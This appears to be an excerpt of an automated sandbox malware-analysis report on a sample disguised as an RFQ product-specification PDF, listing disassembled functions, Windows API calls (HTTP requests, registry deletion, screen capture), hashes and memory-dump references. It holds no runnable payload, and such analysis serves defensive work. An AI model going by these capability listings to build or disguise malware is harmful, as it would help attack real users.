                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                • String ID: 0$tooltips_class32
                                                                                                                • API String ID: 2429346358-3619404913
                                                                                                                • Opcode ID: 4b75407f68163e675ce701bec0a4b54eda33bee7ed75a731d97e152605674bdb
                                                                                                                • Instruction ID: 13a9208e960c779c1c8d110184e31b9bc01bf8a8651d3e87794e7b8dc6c746d5
                                                                                                                • Opcode Fuzzy Hash: 4b75407f68163e675ce701bec0a4b54eda33bee7ed75a731d97e152605674bdb
                                                                                                                • Instruction Fuzzy Hash: 7F716674144241AFDB21CF18DC48BAABBF9FB89314F44491EF99A87361DB74E906CB12
                                                                                                                Function 00AD911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 00AD9147
                                                                                                                  • Part of subcall function 00AD7674: ClientToScreen.USER32(?,?), ref: 00AD769A
                                                                                                                  • Part of subcall function 00AD7674: GetWindowRect.USER32(?,?), ref: 00AD7710
                                                                                                                  • Part of subcall function 00AD7674: PtInRect.USER32(?,?,00AD8B89), ref: 00AD7720
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00AD91B0
                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AD91BB
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AD91DE
                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AD9225
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00AD923E
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00AD9255
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00AD9277
                                                                                                                • DragFinish.SHELL32(?), ref: 00AD927E
                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00AD9371
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                • API String ID: 221274066-3440237614
                                                                                                                • Opcode ID: a3786bd346969c116c7f2bb019c981bdf9c4db64a2fedd4e58ffe16ae2747dd2
                                                                                                                • Instruction ID: 9198bba885514c3dc24d068acebbf38d936038921f57b043721b5c4c28f23c8f
                                                                                                                • Opcode Fuzzy Hash: a3786bd346969c116c7f2bb019c981bdf9c4db64a2fedd4e58ffe16ae2747dd2
                                                                                                                • Instruction Fuzzy Hash: A1615871108301AFC701DFA4DD85DAFBBF8EFC8760F404A1EB596922A1DB709A49CB52
                                                                                                                Function 00ABC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00ABC4B0
                                                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00ABC4C3
                                                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00ABC4D7
                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00ABC4F0
                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00ABC533
                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00ABC549
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00ABC554
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00ABC584
                                                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00ABC5DC
                                                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00ABC5F0
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00ABC5FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3800310941-3916222277
                                                                                                                • Opcode ID: 4f630a6ac6ce9402e98131ed945b350fcb9ddb9bf346bee8fdb7d05538009047
                                                                                                                • Instruction ID: ff238078018a99e7223c5ce19356ba208a70f5814b00dab8690ef8319958103e
                                                                                                                • Opcode Fuzzy Hash: 4f630a6ac6ce9402e98131ed945b350fcb9ddb9bf346bee8fdb7d05538009047
                                                                                                                • Instruction Fuzzy Hash: 6E513BB1541209BFDB21DFA0C988EEA7BBCFF08764F00451AF946D6212DB34EA45DB60
                                                                                                                Function 00AD856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00AD8592
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00AD85A2
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00AD85AD
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00AD85BA
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00AD85C8
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00AD85D7
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00AD85E0
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00AD85E7
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00AD85F8
                                                                                                                • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00ADFC38,?), ref: 00AD8611
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00AD8621
                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00AD8641
                                                                                                                • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00AD8671
                                                                                                                • DeleteObject.GDI32(?), ref: 00AD8699
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00AD86AF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3840717409-0
                                                                                                                • Opcode ID: 8baa3da67aba84351cc1b9c1cdea04c27e00ee1ccc27d0be6f2d305b8682d081
                                                                                                                • Instruction ID: 760843edf74c1bb0ba64cead8f85bb656337b57ee66421e9c42bdd489a1b3bfe
                                                                                                                • Opcode Fuzzy Hash: 8baa3da67aba84351cc1b9c1cdea04c27e00ee1ccc27d0be6f2d305b8682d081
                                                                                                                • Instruction Fuzzy Hash: C0414975601205AFDB11DFA5DC48EAE7BBCFF89B21F10415AF916E7260DB349902CB20
                                                                                                                Function 00AB14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 00AB1502
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00AB150B
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AB1517
                                                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00AB15FB
                                                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 00AB1657
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AB1708
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AB178C
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AB17D8
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AB17E7
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 00AB1823
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                • API String ID: 1234038744-3931177956
                                                                                                                • Opcode ID: c9cbdad53dc66dc1441520f9a77a98f159e254e63c33a1c5d34478c2a8f5cddd
                                                                                                                • Instruction ID: 3aa5c22fdf61dbdb45d312945dddf30aa1af18da9cb21d1414e398641be35caf
                                                                                                                • Opcode Fuzzy Hash: c9cbdad53dc66dc1441520f9a77a98f159e254e63c33a1c5d34478c2a8f5cddd
                                                                                                                • Instruction Fuzzy Hash: 97D1F072A00115EFDB20DF65E9A5BB9B7B9BF44700F908256F807AB182DB30DC45DBA1
                                                                                                                Function 00ACB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00ACC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ACB6AE,?,?), ref: 00ACC9B5
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACC9F1
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACCA68
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACCA9E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ACB6F4
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00ACB772
                                                                                                                • RegDeleteValueW.ADVAPI32(?,?), ref: 00ACB80A
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00ACB87E
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00ACB89C
                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00ACB8F2
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00ACB904
                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00ACB922
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00ACB983
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00ACB994
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                • API String ID: 146587525-4033151799
                                                                                                                • Opcode ID: 126b6cae88529ee5a36357d9ee60552153b205aa03e6e8dbbd749b4e6d06bf03
                                                                                                                • Instruction ID: aea7736503e6dc7fdc975ddd2a924f0d4cb9a279d5a2a8601dfead1324535e10
                                                                                                                • Opcode Fuzzy Hash: 126b6cae88529ee5a36357d9ee60552153b205aa03e6e8dbbd749b4e6d06bf03
                                                                                                                • Instruction Fuzzy Hash: EEC18E34215201AFD710DF24C495F2ABBE5BF84318F55855CF49A8B2A2CB76EC46CB92
                                                                                                                Function 00AC255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 00AC25D8
                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00AC25E8
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00AC25F4
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00AC2601
                                                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00AC266D
                                                                                                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00AC26AC
                                                                                                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00AC26D0
                                                                                                                • SelectObject.GDI32(?,?), ref: 00AC26D8
                                                                                                                • DeleteObject.GDI32(?), ref: 00AC26E1
                                                                                                                • DeleteDC.GDI32(?), ref: 00AC26E8
                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00AC26F3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2598888154-3887548279
                                                                                                                • Opcode ID: 84c8ebfab4f9feb3296582ddc83e67621e267a15c16393581503b2e875839d92
                                                                                                                • Instruction ID: adcf63600713f26c617615e359b4ac45d00aa8e7aadc020b4211d1c2a4742cfc
                                                                                                                • Opcode Fuzzy Hash: 84c8ebfab4f9feb3296582ddc83e67621e267a15c16393581503b2e875839d92
                                                                                                                • Instruction Fuzzy Hash: 4561D275D01219EFCF04CFA8D985EAEBBB5FF48310F20852AE956A7250E774A941CF60
                                                                                                                Function 00A7DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ___free_lconv_mon.LIBCMT ref: 00A7DAA1
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D659
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D66B
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D67D
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D68F
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D6A1
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D6B3
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D6C5
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D6D7
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D6E9
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D6FB
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D70D
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D71F
                                                                                                                  • Part of subcall function 00A7D63C: _free.LIBCMT ref: 00A7D731
                                                                                                                • _free.LIBCMT ref: 00A7DA96
                                                                                                                  • Part of subcall function 00A729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000), ref: 00A729DE
                                                                                                                  • Part of subcall function 00A729C8: GetLastError.KERNEL32(00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000,00000000), ref: 00A729F0
                                                                                                                • _free.LIBCMT ref: 00A7DAB8
                                                                                                                • _free.LIBCMT ref: 00A7DACD
                                                                                                                • _free.LIBCMT ref: 00A7DAD8
                                                                                                                • _free.LIBCMT ref: 00A7DAFA
                                                                                                                • _free.LIBCMT ref: 00A7DB0D
                                                                                                                • _free.LIBCMT ref: 00A7DB1B
                                                                                                                • _free.LIBCMT ref: 00A7DB26
                                                                                                                • _free.LIBCMT ref: 00A7DB5E
                                                                                                                • _free.LIBCMT ref: 00A7DB65
                                                                                                                • _free.LIBCMT ref: 00A7DB82
                                                                                                                • _free.LIBCMT ref: 00A7DB9A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                • String ID:
                                                                                                                • API String ID: 161543041-0
                                                                                                                • Opcode ID: a4b41aa922014483c1cb23ba55df8b2940201ea79bbdc108a79d1d9f4294d260
                                                                                                                • Instruction ID: 2d68a90c51429a50339513f9cd2d6af28bff08d870e08be0540b31b9e128afaf
                                                                                                                • Opcode Fuzzy Hash: a4b41aa922014483c1cb23ba55df8b2940201ea79bbdc108a79d1d9f4294d260
                                                                                                                • Instruction Fuzzy Hash: F43148326043059FEB21AB39ED45B5ABBF9FF80350F19C829E54DD7191DB31AC808B24
                                                                                                                Function 00AA365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00AA369C
                                                                                                                • _wcslen.LIBCMT ref: 00AA36A7
                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00AA3797
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00AA380C
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00AA385D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00AA3882
                                                                                                                • GetParent.USER32(?), ref: 00AA38A0
                                                                                                                • ScreenToClient.USER32(00000000), ref: 00AA38A7
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00AA3921
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00AA395D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                                • String ID: %s%u
                                                                                                                • API String ID: 4010501982-679674701
                                                                                                                • Opcode ID: c54c6a6994fd42bc5fb2c0373efdf7866b1d7c5cd43872baa59def6da76a3cc2
                                                                                                                • Instruction ID: 740444a82b7d22bf1c64d85149a4f4ba694b72444d576b9283f1deb6a3fa49d1
                                                                                                                • Opcode Fuzzy Hash: c54c6a6994fd42bc5fb2c0373efdf7866b1d7c5cd43872baa59def6da76a3cc2
                                                                                                                • Instruction Fuzzy Hash: 1A91A272204606AFDB19DF64C895BEBB7A8FF45350F004619F99AC31D0DB34EA46CB91
                                                                                                                Function 00AA4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00AA4994
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00AA49DA
                                                                                                                • _wcslen.LIBCMT ref: 00AA49EB
                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 00AA49F7
                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 00AA4A2C
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00AA4A64
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00AA4A9D
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00AA4AE6
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00AA4B20
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00AA4B8B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                • String ID: ThumbnailClass
                                                                                                                • API String ID: 1311036022-1241985126
                                                                                                                • Opcode ID: 4d41e020f13038003491df7f7ebbf26986aef02c47011e094b4a9c842b80bde5
                                                                                                                • Instruction ID: 5484cd382238bb93691fa76dff2d4589544482c2777c8c47a8e9fb88d2228fe8
                                                                                                                • Opcode Fuzzy Hash: 4d41e020f13038003491df7f7ebbf26986aef02c47011e094b4a9c842b80bde5
